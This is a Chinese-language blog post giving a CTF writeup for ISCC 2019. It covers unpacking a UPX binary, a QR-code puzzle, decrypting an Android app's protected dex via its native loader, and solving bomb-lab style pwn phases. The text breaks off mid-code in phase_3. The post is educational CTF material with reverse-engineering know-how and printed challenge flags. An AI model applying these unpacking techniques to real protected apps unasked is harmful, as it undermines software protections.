<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="CTF,">










<meta name="description" content="其实是ISCC 2018">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="ISCC 2019 Writeup">
<meta property="og:url" content="http://a1oyss.github.io/2019/06/22/ISCC/index.html">
<meta property="og:site_name" content="a1oyss&#39;s blog">
<meta property="og:description" content="其实是ISCC 2018">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://a1oyss.github.io/2019/06/22/ISCC/1561907160841.png">
<meta property="og:image" content="http://a1oyss.github.io/2019/06/22/ISCC/1561905928260.png">
<meta property="og:image" content="http://a1oyss.github.io/2019/06/22/ISCC/1561905959175.png">
<meta property="og:image" content="http://a1oyss.github.io/2019/06/22/ISCC/1561905982596.png">
<meta property="og:image" content="http://a1oyss.github.io/2019/06/22/ISCC/1561906005352.png">
<meta property="og:image" content="http://a1oyss.github.io/2019/06/22/ISCC/1561801642780.png">
<meta property="og:updated_time" content="2019-06-30T15:56:14.900Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="ISCC 2019 Writeup">
<meta name="twitter:description" content="其实是ISCC 2018">
<meta name="twitter:image" content="http://a1oyss.github.io/2019/06/22/ISCC/1561907160841.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://a1oyss.github.io/2019/06/22/ISCC/">





  <title>ISCC 2019 Writeup | a1oyss's blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">a1oyss's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://a1oyss.github.io/2019/06/22/ISCC/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="a1oyss">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/uploads/avatar.PNG">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="a1oyss's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">ISCC 2019 Writeup</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-06-22T10:49:09+08:00">
                2019-06-22
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 浏览
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>次
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  2.6k
                </span>
              

              

              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><del>其实是ISCC 2018</del></p>
<p><a id="more"></a></p>
<h1 id="reverse">REVERSE</h1>
<p>去网上搜flag时发现是2018原题</p>
<p>首先IDA打开发现UPX壳，使用<code>UPX -d</code>脱壳，然后放进IDA里面看源码</p>
<figure>
<img src="//a1oyss.github.io/2019/06/22/ISCC/1561907160841.png" alt><figcaption>1561907160841</figcaption>
</figure>
<p>有点不忍直视，放弃，直接放进OD里面跑。</p>
<p>调试了几次，摸清了大致流程：</p>
<ol type="1">
<li>接收字符串</li>
<li>根据接收到的字符串打印出来东西</li>
</ol>
<p>然后打印出来的东西本身是在程序里存着，像这样：</p>
<p><img src="//a1oyss.github.io/2019/06/22/ISCC/1561905928260.png"></p>
<p>把这些数据拿出来转成字符串就是这种：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">666f72 495343 5f6172 696375 746869 6e6773 617379 696666 437b41 6c747d 5f6265 6c6c5f 655f64 68657965</span><br><span class="line">for ISC _ar icu thi ngs asy iff C&#123;A lt&#125; _be ll_ e_d heye</span><br></pre></td></tr></table></figure>
<p>输入-&gt;输出规律：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">1 -&gt; for</span><br><span class="line">2 -&gt; ISC</span><br><span class="line">3 -&gt; _ar</span><br><span class="line">4 -&gt; icu </span><br><span class="line">5 -&gt; thi</span><br><span class="line">6 -&gt; ngs</span><br><span class="line">7 -&gt; iff </span><br><span class="line">8 -&gt; _ar</span><br><span class="line">9 -&gt; C&#123;A</span><br><span class="line">10-&gt; lt&#125;</span><br><span class="line">11-&gt; _be</span><br><span class="line">12-&gt; ll</span><br><span class="line">13-&gt; e_d</span><br><span class="line">14-&gt; hey</span><br><span class="line">15-&gt; e_t</span><br><span class="line">16-&gt; e_e</span><br></pre></td></tr></table></figure>
<p>接着拼出flag-&gt;ISCC{All_things_are_easy_before_they_are_difficult}，翻译一下是凡事必先易后难，但是也可以拼成All_things_are_difficult_before_they_are_easy(凡事必先难后易)，不是很懂出题人在想什么，<del>卡拉赞毕业打卡拉赞</del></p>
<h1 id="misc">MISC</h1>
<p>依旧是原题，只不过看2018的wp貌似是个gif，每帧都是不同的二维码，而这次直接弄了一堆到文件夹里</p>
<p>抄下网上的wp</p>
<blockquote>
<p>二维码要求在两个大黑框之间必须有连续的黑白点，这样才行 逐帧分析gif，发现只有第62帧存在一个校正图形</p>
<p><img src="//a1oyss.github.io/2019/06/22/ISCC/1561905959175.png"></p>
<p>，保存补上位置探测图形和定位图形</p>
<p><img src="//a1oyss.github.io/2019/06/22/ISCC/1561905982596.png"></p>
<p>，扫描得到ISRDQzgxMDI=，base64解码得到!$CC8102</p>
<p><del>嗦不粗话，连flag都没换</del></p>
</blockquote>
<h1 id="mobile">MOBILE</h1>
<p>原题，最大的收获是找到了不少好用的工具</p>
<p>放入APKIDE中打开，查看<code>AndroidManifest.xml</code>，看到启动类为<code>com.example.shellapplication.WrapperApplication</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">WrapperApplication</span></span></span><br><span class="line"><span class="class">  <span class="keyword">extends</span> <span class="title">Application</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">  <span class="keyword">static</span></span><br><span class="line">  &#123;</span><br><span class="line">    System.loadLibrary(<span class="string">"reinforce"</span>);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">public</span> <span class="keyword">native</span> <span class="keyword">void</span> <span class="title">attachBaseContext</span><span class="params">(Context paramContext)</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">public</span> <span class="keyword">native</span> <span class="keyword">void</span> <span class="title">onCreate</span><span class="params">()</span></span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这个类加载了<code>libreinforce.so</code>，接着去看<code>onCreate()</code>和<code>attachBaseContext</code>中的内容</p>
<p>onCreate：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">v2 = a2;</span><br><span class="line">v3 = a1;</span><br><span class="line">v4 = (*(<span class="keyword">int</span> (**)(<span class="keyword">void</span>))(*(_DWORD *)a1 + <span class="number">24</span>))();</span><br><span class="line">v5 = v4;</span><br><span class="line">v6 = _JNIEnv::GetMethodID(v3, v4, <span class="string">"getPackageName"</span>, <span class="string">"()Ljava/lang/String;"</span>);</span><br><span class="line">v7 = _JNIEnv::CallObjectMethod(v3, v2, v6);</span><br><span class="line">v8 = (*(<span class="keyword">int</span> (__fastcall **)(<span class="keyword">int</span>, <span class="keyword">int</span>, _DWORD))(*(_DWORD *)v3 + <span class="number">676</span>))(v3, v7, <span class="number">0</span>);</span><br><span class="line">_android_log_print(<span class="number">4</span>, <span class="string">"TTT"</span>, <span class="string">"shellapplication's onCreate execute"</span>);</span><br><span class="line"><span class="built_in">memset</span>(&amp;v12, <span class="number">0</span>, <span class="number">0x100</span>u);</span><br><span class="line"><span class="built_in">sprintf</span>(&amp;v12, <span class="string">"/data/data/%s/lib/libcore.so"</span>, v8);</span><br><span class="line">v9 = dlopen(&amp;v12, <span class="number">1</span>);</span><br><span class="line">v10 = (<span class="keyword">void</span> (__fastcall *)(<span class="keyword">int</span>))dlsym(v9, <span class="string">"resume"</span>);</span><br><span class="line">v10(v3);</span><br><span class="line">_JNIEnv::DeleteLocalRef(v3, v7);</span><br><span class="line"><span class="keyword">return</span> _JNIEnv::DeleteLocalRef(v3, v5);</span><br></pre></td></tr></table></figure>
<p><code>onCreate</code>中加载了<code>libcore.so</code>以及调用了<code>resume</code>这个方法</p>
<p>attachBaseContext：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">memset</span>(&amp;v23, <span class="number">0</span>, <span class="number">0x100</span>u);</span><br><span class="line"><span class="built_in">sprintf</span>(&amp;v23, <span class="string">"%s/protected.jar"</span>, v17);</span><br><span class="line">extractJar(v4, v5, &amp;v23);</span><br><span class="line">byte_601C = (<span class="keyword">unsigned</span> <span class="keyword">int</span>)dalvikOrArt();</span><br><span class="line"><span class="built_in">memset</span>(&amp;v24, <span class="number">0</span>, <span class="number">0x100</span>u);</span><br><span class="line"><span class="built_in">sprintf</span>(&amp;v24, <span class="string">"%s/origin.dex"</span>, v17);</span><br><span class="line">decryptJar(&amp;v23, &amp;v24);</span><br><span class="line">v22 = v4;</span><br><span class="line"><span class="built_in">memset</span>(&amp;v25, <span class="number">0</span>, <span class="number">0x100</span>u);</span><br><span class="line"><span class="built_in">sprintf</span>(&amp;v25, <span class="string">"%s/protected.so"</span>, v17);</span><br></pre></td></tr></table></figure>
<p><code>attachBaseContext</code>中最关键的部分是对<code>assets</code>中的 <code>protected.jar</code>进行解密，解密操作很简单，按位取反</p>
<p>decryptJar：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">while</span> ( v9 &lt; v6 )</span><br><span class="line">    &#123;</span><br><span class="line">      *((_BYTE *)v8 + v9) = ~*((_BYTE *)v7 + v9);</span><br><span class="line">      ++v9;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>解密脚本：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	FILE* fi, * fo;</span><br><span class="line">	fo = fopen(<span class="string">"dec.dex"</span>, <span class="string">"wb"</span>);</span><br><span class="line">	fi = fopen(<span class="string">"protected.jar"</span>, <span class="string">"rb"</span>);</span><br><span class="line">	<span class="keyword">char</span>  fBuffer[<span class="number">1</span>];</span><br><span class="line">	<span class="keyword">while</span> (!feof(fi)) &#123;</span><br><span class="line">		fread(fBuffer, <span class="number">1</span>, <span class="number">1</span>, fi);    <span class="comment">// 读取1字节</span></span><br><span class="line">		<span class="keyword">if</span> (!feof(fi)) &#123;</span><br><span class="line">			*fBuffer =~ *fBuffer;   <span class="comment">// xor encrypt</span></span><br><span class="line">			fwrite(fBuffer, <span class="number">1</span>, <span class="number">1</span>, fo); <span class="comment">// 写入文件</span></span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>之所以为什么用C来写。。。因为python按位取反之后返回的是int类型，而负数又没办法<code>to_bytes()</code>，写了半天也没写出来一个比较优雅的exp，放弃。</p>
<p>解密之后得到一个dex文件，使用<code>dex2jar</code>将其转成jar文件，使用jd-gui打开。</p>
<p>onCreate中调用<code>ProtectedClass</code>的<code>verifyKey</code>对输入进行检查：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (ProtectedClass.verifyKey(inputText.getText().toString())) &#123;</span><br><span class="line">              str = <span class="string">"密码正确"</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">              str = <span class="string">"密码错误"</span>;</span><br><span class="line">            &#125;</span><br></pre></td></tr></table></figure>
<p><code>ProtectedClass</code>的逻辑：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">ProtectedClass</span> </span>&#123;</span><br><span class="line">  <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">int</span>[][] key = &#123; &#123; <span class="number">17</span>, <span class="number">12</span>, <span class="number">3</span> &#125;, &#123; <span class="number">21</span>, <span class="number">12</span>, <span class="number">9</span> &#125;, &#123; <span class="number">17</span>, <span class="number">14</span>, <span class="number">6</span> &#125; &#125;;</span><br><span class="line">  </span><br><span class="line">  <span class="function"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">native</span> String <span class="title">getEncrypttext</span><span class="params">(String paramString)</span></span>;</span><br><span class="line">  </span><br><span class="line">  <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title">getString</span><span class="params">()</span> </span>&#123; <span class="keyword">return</span> <span class="string">"bfs-iscc"</span>; &#125;</span><br><span class="line">  </span><br><span class="line">  <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">boolean</span> <span class="title">verifyKey</span><span class="params">(String paramString)</span> </span>&#123; <span class="keyword">return</span> (paramString.length() % <span class="number">3</span> != <span class="number">0</span>) ? <span class="keyword">false</span> : <span class="string">"OYUGMCH&gt;YWOCBXF))9/3)YYE"</span>.equals(getEncrypttext(paramString)); &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>将输入进行加密之后与<code>OYUGMCH&gt;YWOCBXF</code>进行比较，但是关键的<code>getEncrypttext</code>函数又是个native。</p>
<p>之前libreinforce.so中，在加载完libcore.so后，还调用了其中的resume方法</p>
<p><code>resume</code>：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">v1 = a1;</span><br><span class="line">v5 = <span class="number">0</span>;</span><br><span class="line">v6 = <span class="number">0</span>;</span><br><span class="line">v7 = <span class="number">0</span>;</span><br><span class="line">v2 = dalvikOrArt();</span><br><span class="line">decryptAndParse((<span class="keyword">int</span>)&amp;v5);</span><br><span class="line">getSdkint(v1);</span><br><span class="line"><span class="keyword">if</span> ( v2 )</span><br><span class="line">  resumeArt(v1, &amp;v5);</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">  resumeDalvik((<span class="keyword">int</span>)v1, &amp;v5);</span><br><span class="line">v3 = (<span class="keyword">char</span> *)v5;</span><br><span class="line">v4 = v6;</span><br><span class="line"><span class="keyword">while</span> ( v3 != (<span class="keyword">char</span> *)v4 )</span><br><span class="line">&#123;</span><br><span class="line">  sub_539C(v3 + <span class="number">8</span>);</span><br><span class="line">  sub_539C(v3 + <span class="number">4</span>);</span><br><span class="line">  sub_539C(v3);</span><br><span class="line">  v3 += <span class="number">16</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> ( v5 )</span><br><span class="line">  <span class="function"><span class="keyword">operator</span> <span class="title">delete</span><span class="params">(v5)</span></span>;</span><br></pre></td></tr></table></figure>
<p>什么都看不出来。</p>
<p>看大佬的博客里面说使用了一个安卓的热补丁修复机制。</p>
<blockquote>
<p>关于热补丁机制的描述是这样的：</p>
<p>在不进行版本更新的情况下，动态的屏蔽掉程序原来存在BUG的函数，使用新的函数替代。</p>
<p>新函数一般存在于另一个so中</p>
<p>热补丁的流程主要有：</p>
<ol type="1">
<li>通过函数名找到原来函数的地址偏移（ArtMethod-&gt;dex_code_item_offset_）。</li>
<li>将新函数地址偏移替换原函数地址偏移。</li>
</ol>
<p>而上述程序也为类似主要流程如下：</p>
<ol type="1">
<li>分析安卓虚拟机为dalvik还是art，二者热补丁方式不一样。</li>
<li>解密解析补丁函数表(decryptAndParse)</li>
<li>执行补丁操作</li>
</ol>
</blockquote>
<p>接着在<code>decryptAndParse</code>中，对补丁表每字节+10，进行解密，解密后的补丁表：</p>
<p><code>1Lcom/example/originapplication/ProtectedClass;getEncrypttext(Ljava/lang/String;)Ljava/lang/String;1416140</code></p>
<p>后面这串数字就是新函数的位置。</p>
<p><img src="//a1oyss.github.io/2019/06/22/ISCC/1561906005352.png"></p>
<p>这部分就是函数的字节码，但是IDA没有显示出来汇编，需要手动转换</p>
<p><del>不会</del></p>
<p>剩下的参考https://mypre.cn/2018/10/27/bfs-iscc-mobile</p>
<h1 id="pwn">PWN</h1>
<h2 id="bomb_squad">bomb_squad</h2>
<p>首先checksec一下</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[*] <span class="string">'/root/work/CLSknpNF3iWUuHCX.bomb_squad'</span></span><br><span class="line">    Arch:     i386-<span class="number">32</span>-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (<span class="number">0</span>x8048000)</span><br></pre></td></tr></table></figure>
<p>这个题目首先由4个小关卡，全部通关之后才能达到getflag的地方</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __cdecl __<span class="function">noreturn <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  setvbuf(<span class="built_in">stdout</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Welcome to the bomb squad! Your first task: Diffuse this practice bomb."</span>);</span><br><span class="line">  phase_1();</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"You got through phase 1 alright! Good work! But can you handle phase 2?"</span>);</span><br><span class="line">  phase_2();</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"You could handle it! Good job... I think you can handle phase 3... right?"</span>);</span><br><span class="line">  phase_3();</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"DAYUM, you got it! You know the drill, time for phase 4."</span>);</span><br><span class="line">  phase_4();</span><br><span class="line">  print_flag();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h3 id="phase_1">phase_1</h3>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">phase_1</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> *v0; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Give me a number!"</span>);</span><br><span class="line">  v0 = get_line();</span><br><span class="line">  result = <span class="number">3</span> * (<span class="number">2</span> * atoi(v0) / <span class="number">37</span> - <span class="number">18</span>) - <span class="number">1</span>;</span><br><span class="line">  <span class="keyword">if</span> ( result != <span class="number">1337</span> )</span><br><span class="line">    explode_bomb();</span><br><span class="line">  phase1_solved = <span class="number">1</span>;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>关卡1接收一个数字，经过一系列计算，使得最终结果要等于1337，使用<code>z3-solver</code>很容易得出解。</p>
<figure>
<img src="//a1oyss.github.io/2019/06/22/ISCC/1561801642780.png" alt><figcaption>1561801642780</figcaption>
</figure>
<h3 id="phase_2">phase_2</h3>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">phase_2</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">"Give me an array of numbers!"</span>);</span><br><span class="line">  s = get_line();</span><br><span class="line">  <span class="built_in">sscanf</span>(s, <span class="string">"[%d, %d, %d, %d, %d, %d]"</span>, v4, _2C, _30, _34, _38, _3C);</span><br><span class="line">  result = v4[<span class="number">0</span>];</span><br><span class="line">  <span class="keyword">if</span> ( v4[<span class="number">0</span>] != <span class="number">1</span> )</span><br><span class="line">    explode_bomb();</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">1</span>; i &lt;= <span class="number">5</span>; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    v2 = v4[i - <span class="number">1</span>] + v4[i];</span><br><span class="line">    result = func2(i);</span><br><span class="line">    <span class="keyword">if</span> ( v2 != result )</span><br><span class="line">      explode_bomb();</span><br><span class="line">  &#125;</span><br><span class="line">  phase2_solved = <span class="number">1</span>;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>接收一个数组，要求满足<code>a[0]=1，a[i-1]+a[i]=2^i</code>，那么结果就是<code>[1, 1, 3, 5, 11, 21]</code></p>
<h3 id="phase_2-1">phase_2</h3>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">phase_3</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  v4 = get_line();</span><br><span class="line">  v5 = <span class="string">"rqzzepiwMLepiwYsLYtpqpvzLsYeM"</span>;</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span 